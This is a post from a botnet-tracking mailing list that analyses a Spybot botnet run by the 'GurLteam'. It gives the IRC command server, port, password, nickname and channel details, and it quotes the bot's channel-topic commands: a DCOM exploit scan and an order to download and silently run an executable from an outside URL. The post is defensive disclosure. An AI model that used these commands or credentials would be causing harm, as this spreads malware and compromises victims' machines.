Re: [botnets] new one

[Niklas Schiffler]

To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------
Jeremy Linden wrote:
..
 >
 > I just had a conversation with the guy who runs this botnet.  He's from
 > Lebanon, part of the GurLteam (a common name if you do lots of botnet
 > stuff), and he installs spyware on his machines, as a business.  In my
 > opinion, this won't be used for DDoS; these guys are professional
 > criminals who just want to make their money.  I hope they get busted
 > though.
 >
 > Jeremy Linden

Here's another one by the GurLteam:

Botnet (W32/Spybot.AKCH):

[ Network services ]
     * Looks for an Internet connection.
     * Connects to "users.hot-screen.com" on port 6667 (TCP).
     * Connects to IRC server.
     * IRC: Uses password nadjoe.
     * IRC: Uses nickname Tfeh-80340024.
     * IRC: Uses username ezkieyacag.
     * IRC: Joins channel ##Tfeh with password li.
     * IRC: Sets the usermode for user Tfeh-80340024 to -x+B.


inetnum:         83.98.133.0 - 83.98.133.255
netname:         NL-NFORCE-ENTERTAINMENT
descr:           NForce Entertainment
country:         NL
admin-c:         RVE16-RIPE
tech-c:          RVE16-RIPE
status:          ASSIGNED PA "status:" definitions
mnt-by:          ROKSCOM-MNT
source:          RIPE # Filtered

* Looking up users.hot-screen.com
* Connecting to users.hot-screen.com (83.98.133.125) port 6667...
* Connected. Now logging in...
* GurLStuff, [EMAIL PROTECTED]
* MAP KNOCK SAFELIST HCN MAXCHANNELS=8 MAXBANS=60 NICKLEN=30 TOPICLEN=307 
KICKLEN=307 MAXTARGETS=15 AWAYLEN=307 :are supported by this server
* WALLCHOPS WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ 
CHANMODES=be,kfL,l,psmntirRcOAQKVGCuzNSMT NETWORK=GurLStuff CASEMAPPING=ascii 
EXTBAN=~,cqr :are supported by this server

  Now talking on ##Tfeh
* Topic for ##Tfeh is: ;raw join ##lscan,##lmon
* Topic for ##Tfeh set by GurL at Sun Mar 26 20:22:26 2006

--> Now talking on ##lscan
* Topic for ##lscan is: ;advscan dcom135 300 5 0 -r -s
* Topic for ##lscan set by GurL at Sun Mar 26 20:22:26 2006

--> Now talking on ##lmon
* Topic for ##lmon is: ;download http://www.darkblueroom.com/smart.exe 
c:\smart.exe 1 -s
* Topic for ##lmon set by GurL at Sun Mar 26 20:22:25 2006

smart.exe extracts the following files to to c:\Windows\tok (scanned with 
AntiVir)

mc-110-12-0000336.exe (DR/Dldr.NSIS.Agent.P.1)
smart.exe (?)
yaz.exe (TR/LowZones.CR.2)
zan.exe (TR/LowZones.CR.3)
run.bat

I don't know yet what the unpacked smart.exe does.

nick..

_______________________________________________
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
All list and server information are public and available to law enforcement 
upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets